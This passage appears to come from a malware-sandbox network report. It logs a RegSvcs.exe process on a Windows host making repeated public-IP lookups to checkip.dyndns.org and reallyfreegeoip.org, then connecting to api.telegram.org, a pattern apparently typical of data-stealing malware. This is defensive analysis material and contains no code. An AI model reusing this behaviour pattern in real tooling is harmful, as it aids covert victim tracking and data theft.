                                                                                                                          Jan 10, 2025 23:44:33.684500933 CET44349765104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.684561014 CET49765443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:33.685247898 CET49765443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:33.698628902 CET4976480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:33.699664116 CET4976680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:33.703664064 CET8049764158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.703749895 CET4976480192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:33.704488993 CET8049766158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:33.704600096 CET4976680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:33.704691887 CET4976680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:33.709461927 CET8049766158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.296876907 CET8049766158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.299140930 CET49767443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:34.299211025 CET44349767104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.299489021 CET49767443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:34.299784899 CET49767443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:34.299799919 CET44349767104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.349558115 CET4976680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:34.771974087 CET44349767104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.773550034 CET49767443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:34.773586988 CET44349767104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.928774118 CET44349767104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.928837061 CET44349767104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.928915977 CET49767443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:34.929527044 CET49767443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:34.933187008 CET4976680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:34.934082031 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:34.938071012 CET8049766158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.938137054 CET4976680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:34.938833952 CET8049768158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:34.938908100 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:34.939143896 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:34.943873882 CET8049768158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:35.528271914 CET8049768158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:35.529959917 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:35.530018091 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:35.530119896 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:35.530410051 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:35.530421972 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:35.583872080 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:35.994404078 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:35.996033907 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:35.996069908 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.141884089 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.141956091 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.142194986 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.142648935 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.145781994 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.147000074 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.151341915 CET8049768158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.151407003 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.152534962 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.152606010 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.152740955 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.158070087 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.770400047 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.771795034 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.771904945 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.772016048 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.772294044 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.772325039 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.818279982 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:37.249052048 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.250844955 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:37.250890970 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.376630068 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.376708984 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.376873016 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:37.377383947 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:37.386955976 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:37.387746096 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:37.387797117 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.387895107 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:37.388389111 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:37.388403893 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.392863035 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.392930984 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:38.004987001 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.005176067 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.006848097 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.006860018 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.007822990 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.009490967 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.051332951 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.256285906 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.256375074 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.256438017 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.258487940 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.819343090 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:54.258106947 CET4976280192.168.2.4158.101.44.242

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 10, 2025 23:44:10.970925093 CET6323253192.168.2.41.1.1.1
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET53632321.1.1.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:11.831013918 CET5316753192.168.2.41.1.1.1
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET53531671.1.1.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:21.881253958 CET5066553192.168.2.41.1.1.1
                                                                                                                          Jan 10, 2025 23:44:21.888406992 CET53506651.1.1.1192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 10, 2025 23:44:10.970925093 CET192.168.2.41.1.1.10xf3baStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.831013918 CET192.168.2.41.1.1.10xd0cdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:21.881253958 CET192.168.2.41.1.1.10xeba1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET1.1.1.1192.168.2.40xf3baNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET1.1.1.1192.168.2.40xf3baNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET1.1.1.1192.168.2.40xf3baNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET1.1.1.1192.168.2.40xf3baNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET1.1.1.1192.168.2.40xf3baNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:10.977775097 CET1.1.1.1192.168.2.40xf3baNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:11.838495016 CET1.1.1.1192.168.2.40xd0cdNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 10, 2025 23:44:21.888406992 CET1.1.1.1192.168.2.40xeba1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • reallyfreegeoip.org
                                                                                                                          • api.telegram.org
                                                                                                                          • checkip.dyndns.org

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449731158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:10.988344908 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:11.597074986 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 7546aeea9470fa3bc21683d86c9fc2e6
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 10, 2025 23:44:11.612184048 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:11.780548096 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 823fc36e588a20a1ef0e81acebf0422e
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 10, 2025 23:44:12.527944088 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:12.688503027 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:12 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: d2d20aba1b567bbc7620dc97522ad1b4
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449734158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:13.324970007 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:13.918745041 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:13 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 51372278734c7b0192063acc0a6b8b58
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449736158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:14.547512054 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:15.134408951 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:15 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 42e36cd884095d324571ed8992357a26
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449738158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:15.782411098 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:16.351823092 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:16 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 08466d5f6f18fc15fa8a44c1df493ac0
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449740158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:16.975142956 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:17.535942078 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:17 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 4e7c0fd8cf927ff34dedc59a49d66c84
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449743158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:18.225591898 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:18.808058977 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:18 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: dc10311159c2670452ed8fcc0097bd66
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449748158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:19.433346033 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:20.000343084 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:19 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: cd59ad404384ee4fe9dc1086b09a369f
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449752158.101.44.242807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:20.614590883 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:21.237056017 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:21 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 994e4386612eab1ac2fb840b392f087d
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449755158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:26.332545042 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:26.912889957 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: ea5706e62470106aa7f41da2747ca749
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 10, 2025 23:44:26.916616917 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
